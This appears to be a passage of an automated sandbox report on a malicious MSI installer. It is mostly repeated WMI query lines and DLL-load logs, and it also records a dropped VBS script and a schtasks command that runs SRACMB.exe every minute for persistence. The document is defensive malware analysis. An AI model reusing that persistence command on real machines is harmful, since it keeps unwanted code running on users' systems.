              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\Installer\MSI4976.tmp | File read: C:\Users\desktop.ini
              Source: C:\Windows\Installer\MSI4976.tmp | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: sdlvrr.msi | Virustotal: Detection: 50%
              Source: sdlvrr.msi | ReversingLabs: Detection: 42%
              Source: unknown | Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\sdlvrr.msi"
              Source: unknown | Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
              Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\Installer\MSI4976.tmp "C:\Windows\Installer\MSI4976.tmp"
              Source: C:\Windows\Installer\MSI4976.tmp | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn VYZSPQ.exe /tr C:\Users\user\AppData\Roaming\Windata\SRACMB.exe /sc minute /mo 1
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\Installer\MSI4976.tmp | Process created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\VYZSPQ.vbs
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn VYZSPQ.exe /tr C:\Users\user\AppData\Roaming\Windata\SRACMB.exe /sc minute /mo 1
              Source: unknown | Process created: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe C:\Users\user\AppData\Roaming\Windata\SRACMB.exe
              Source: unknown | Process created: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe "C:\Users\user\AppData\Roaming\Windata\SRACMB.exe"
              Source: unknown | Process created: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe C:\Users\user\AppData\Roaming\Windata\SRACMB.exe
              Source: C:\Windows\System32\msiexec.exe | Section loaded: apphelp.dll
              Source: C:\Windows\System32\msiexec.exe | Section loaded: aclayers.dll
              Source: C:\Windows\System32\msiexec.exe | Section loaded: sfc.dll
              Source: C:\Windows\System32\msiexec.exe | Section loaded: sfc_os.dll
              Source: C:\Windows\System32\msiexec.exe | Section loaded: msi.dll
              Source: C:\Windows\System32\msiexec.exe | Section loaded: srpapi.dll
              Source: C:\Windows\System32\msiexec.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\msiexec.exe | Section loaded: tsappcmp.dll
              Source: C:\Windows\System32\msiexec.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\System32\msiexec.exe | Section loaded: textinputframework.dll
              Source: C:\Windows\System32\msiexec.exe | Section loaded: coreuicomponents.dll
              Source: C:\Windows\System32\msiexec.exe | Section loaded: coremessaging.dll
              Source: C:\Windows\System32\msiexec.exe | Section loaded: ntmarta.dll
              Source: C:\Windows\System32\msiexec.exe | Section loaded: wintypes.dll
              Source: C:\Windows\System32\msiexec.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\System32\msiexec.exe | Section loaded: wldp.dll
              Source: C:\Windows\System32\msiexec.exe | Section loaded: propsys.dll
              Source: C:\Windows\System32\msiexec.exe | Section loaded: textshaping.dll
              Source: C:\Windows\System32\msiexec.exe | Section loaded: netapi32.dll
              Source: C:\Windows\System32\msiexec.exe | Section loaded: wkscli.dll
              Source: C:\Windows\System32\msiexec.exe | Section loaded: netutils.dll
              Source: C:\Windows\System32\msiexec.exe | Section loaded: version.dll
              Source: C:\Windows\System32\msiexec.exe | Section loaded: mscoree.dll
              Source: C:\Windows\System32\msiexec.exe | Section loaded: profapi.dll
              Source: C:\Windows\System32\msiexec.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\msiexec.exe | Section loaded: pcacli.dll
              Source: C:\Windows\System32\msiexec.exe | Section loaded: mpr.dll
              Source: C:\Windows\System32\msiexec.exe | Section loaded: apphelp.dll
              Source: C:\Windows\System32\msiexec.exe | Section loaded: aclayers.dll
              Source: C:\Windows\System32\msiexec.exe | Section loaded: sfc.dll
              Source: C:\Windows\System32\msiexec.exe | Section loaded: sfc_os.dll
              Source: C:\Windows\System32\msiexec.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\msiexec.exe | Section loaded: msi.dll
              Source: C:\Windows\System32\msiexec.exe | Section loaded: tsappcmp.dll
              Source: C:\Windows\System32\msiexec.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\msiexec.exe | Section loaded: profapi.dll
              Source: C:\Windows\System32\msiexec.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\msiexec.exe | Section loaded: netapi32.dll
              Source: C:\Windows\System32\msiexec.exe | Section loaded: wkscli.dll
              Source: C:\Windows\System32\msiexec.exe | Section loaded: netutils.dll
              Source: C:\Windows\System32\msiexec.exe | Section loaded: srclient.dll
              Source: C:\Windows\System32\msiexec.exe | Section loaded: spp.dll
              Source: C:\Windows\System32\msiexec.exe | Section loaded: powrprof.dll
              Source: C:\Windows\System32\msiexec.exe | Section loaded: vssapi.dll
              Source: C:\Windows\System32\msiexec.exe | Section loaded: vsstrace.dll
              Source: C:\Windows\System32\msiexec.exe | Section loaded: umpdc.dll
              Source: C:\Windows\System32\msiexec.exe | Section loaded: wldp.dll
              Source: C:\Windows\System32\msiexec.exe | Section loaded: mscoree.dll
              Source: C:\Windows\System32\msiexec.exe | Section loaded: version.dll
              Source: C:\Windows\System32\msiexec.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\msiexec.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\msiexec.exe | Section loaded: rstrtmgr.dll
              Source: C:\Windows\System32\msiexec.exe | Section loaded: ncrypt.dll
              Source: C:\Windows\System32\msiexec.exe | Section loaded: ntasn1.dll
              Source: C:\Windows\System32\msiexec.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\System32\msiexec.exe | Section loaded: pcacli.dll
              Source: C:\Windows\System32\msiexec.exe | Section loaded: mpr.dll
              Source: C:\Windows\Installer\MSI4976.tmp | Section loaded: apphelp.dll
              Source: C:\Windows\Installer\MSI4976.tmp | Section loaded: iphlpapi.dll
              Source: C:\Windows\Installer\MSI4976.tmp | Section loaded: mpr.dll
              Source: C:\Windows\Installer\MSI4976.tmp | Section loaded: userenv.dll
              Source: C:\Windows\Installer\MSI4976.tmp | Section loaded: uxtheme.dll
              Source: C:\Windows\Installer\MSI4976.tmp | Section loaded: version.dll
              Source: C:\Windows\Installer\MSI4976.tmp | Section loaded: wininet.dll
              Source: C:\Windows\Installer\MSI4976.tmp | Section loaded: winmm.dll
              Source: C:\Windows\Installer\MSI4976.tmp | Section loaded: wsock32.dll
              Source: C:\Windows\Installer\MSI4976.tmp | Section loaded: kernel.appcore.dll
              Source: C:\Windows\Installer\MSI4976.tmp | Section loaded: windows.storage.dll
              Source: C:\Windows\Installer\MSI4976.tmp | Section loaded: wldp.dll
              Source: C:\Windows\Installer\MSI4976.tmp | Section loaded: propsys.dll
              Source: C:\Windows\Installer\MSI4976.tmp | Section loaded: wbemcomn.dll
              Source: C:\Windows\Installer\MSI4976.tmp | Section loaded: napinsp.dll
              Source: C:\Windows\Installer\MSI4976.tmp | Section loaded: pnrpnsp.dll
              Source: C:\Windows\Installer\MSI4976.tmp | Section loaded: wshbth.dll
              Source: C:\Windows\Installer\MSI4976.tmp | Section loaded: nlaapi.dll
              Source: C:\Windows\Installer\MSI4976.tmp | Section loaded: mswsock.dll
              Source: C:\Windows\Installer\MSI4976.tmp | Section loaded: dnsapi.dll
              Source: C:\Windows\Installer\MSI4976.tmp | Section loaded: winrnr.dll
              Source: C:\Windows\Installer\MSI4976.tmp | Section loaded: fwpuclnt.dll
              Source: C:\Windows\Installer\MSI4976.tmp | Section loaded: rasadhlp.dll
              Source: C:\Windows\Installer\MSI4976.tmp | Section loaded: amsi.dll
              Source: C:\Windows\Installer\MSI4976.tmp | Section loaded: profapi.dll
              Source: C:\Windows\Installer\MSI4976.tmp | Section loaded: sxs.dll
              Source: C:\Windows\Installer\MSI4976.tmp | Section loaded: sspicli.dll
              Source: C:\Windows\Installer\MSI4976.tmp | Section loaded: napinsp.dll
              Source: C:\Windows\Installer\MSI4976.tmp | Section loaded: pnrpnsp.dll
              Source: C:\Windows\Installer\MSI4976.tmp | Section loaded: wshbth.dll
              Source: C:\Windows\Installer\MSI4976.tmp | Section loaded: nlaapi.dll
              Source: C:\Windows\Installer\MSI4976.tmp | Section loaded: winrnr.dll
              Source: C:\Windows\Installer\MSI4976.tmp | Section loaded: fwpuclnt.dll
              Source: C:\Windows\Installer\MSI4976.tmp | Section loaded: linkinfo.dll
              Source: C:\Windows\Installer\MSI4976.tmp | Section loaded: ntshrui.dll
              Source: C:\Windows\Installer\MSI4976.tmp | Section loaded: srvcli.dll
              Source: C:\Windows\Installer\MSI4976.tmp | Section loaded: cscapi.dll
              Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: version.dll
              Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sxs.dll
              Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: vbscript.dll
              Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: amsi.dll
              Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msisip.dll
              Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wshext.dll
              Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrobj.dll
              Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: mpr.dll
              Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrrun.dll
              Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
              Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: xmllite.dll
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Section loaded: apphelp.dll
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Section loaded: iphlpapi.dll
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Section loaded: mpr.dll
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Section loaded: userenv.dll
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Section loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Section loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Section loaded: wininet.dll
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Section loaded: winmm.dll
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Section loaded: wsock32.dll
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Section loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Section loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Section loaded: wldp.dll
